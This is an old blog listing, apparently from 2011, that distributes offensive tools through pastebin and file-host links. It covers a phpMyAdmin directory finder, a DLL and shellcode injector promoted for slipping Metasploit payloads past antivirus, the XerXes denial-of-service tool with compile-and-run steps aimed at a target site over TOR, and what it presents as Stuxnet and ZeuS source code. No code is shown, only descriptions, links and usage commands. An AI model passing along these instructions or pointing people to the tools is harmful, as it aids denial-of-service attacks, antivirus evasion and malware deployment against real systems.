... neuere Einträge
Sunday, 17. July 2011
PHPmyadmin Finder - Perl
Am Sunday, 17. Jul 2011 im Topic 'Source Code'
This is a simple perl script that enumerates various possible directories on a given website in order to determine whether or not a phpMyAdmin instance may be installed.
Source
http://pastebin.com/1cbN2Yfm
Source
http://pastebin.com/1cbN2Yfm
Tuesday, 12. July 2011
Syringe - Dll/Shellcode Injection Tool C/C++
Am Tuesday, 12. Jul 2011 im Topic 'Source Code'
Syringe is a general purpose injection utility for the windows platform. It supports injection of DLLs, and shellcode into remote processes as well execution of shellcode (via the same method of shellcodeexec) https://github.com/inquisb/shellcodeexec/. It can be very useful for executing Metasploit payloads while bypassing many popular anti-virus implementations as well as executing custom made DLLs (not included).
Sorce Code
http://pastebin.com/pu76ixSH
Sorce Code
http://pastebin.com/pu76ixSH
Monday, 11. July 2011
XerXes C/C++ - Linux
Am Monday, 11. Jul 2011 im Topic 'Source Code'
XerXes is one of the most powerful private dos tool
Source Code
http://pastebin.com/eLrQXTnu
Info
http://vimeo.com/17268609
Platform: Linux
Instructions for use: Save that as xerxes.c
then in terminal: gcc xerxes.c -o xerxes
Followed by ./xerxes www.target.com 80
Ensure TOR is running and on the port in the source, feel free to edit that in the source to match your port.
Source Code
http://pastebin.com/eLrQXTnu
Info
http://vimeo.com/17268609
Platform: Linux
Instructions for use: Save that as xerxes.c
then in terminal: gcc xerxes.c -o xerxes
Followed by ./xerxes www.target.com 80
Ensure TOR is running and on the port in the source, feel free to edit that in the source to match your port.
Monday, 4. July 2011
Stuxnet Source Code C&C++
Am Monday, 4. Jul 2011 im Topic 'Source Code'
Stuxnet is designed to programmatically alter Programmable Logic Controllers (PLCs) used in those facilities. In an ICS environment, the PLCs automate industrial type tasks such as regulating flow rate to maintain pressure and temperature controls.
Download:
http://www.multiupload.com/BDNYSCY5PC
http://youtu.be/7g0pi4J8auQ
Download:
http://www.multiupload.com/BDNYSCY5PC
http://youtu.be/7g0pi4J8auQ
Thursday, 30. June 2011
ZeuS Source Code
Am Thursday, 30. Jun 2011 im Topic 'Source Code'
Stuxnet Decompiled Source code Dump
Am Thursday, 30. Jun 2011 im Topic 'Source Code'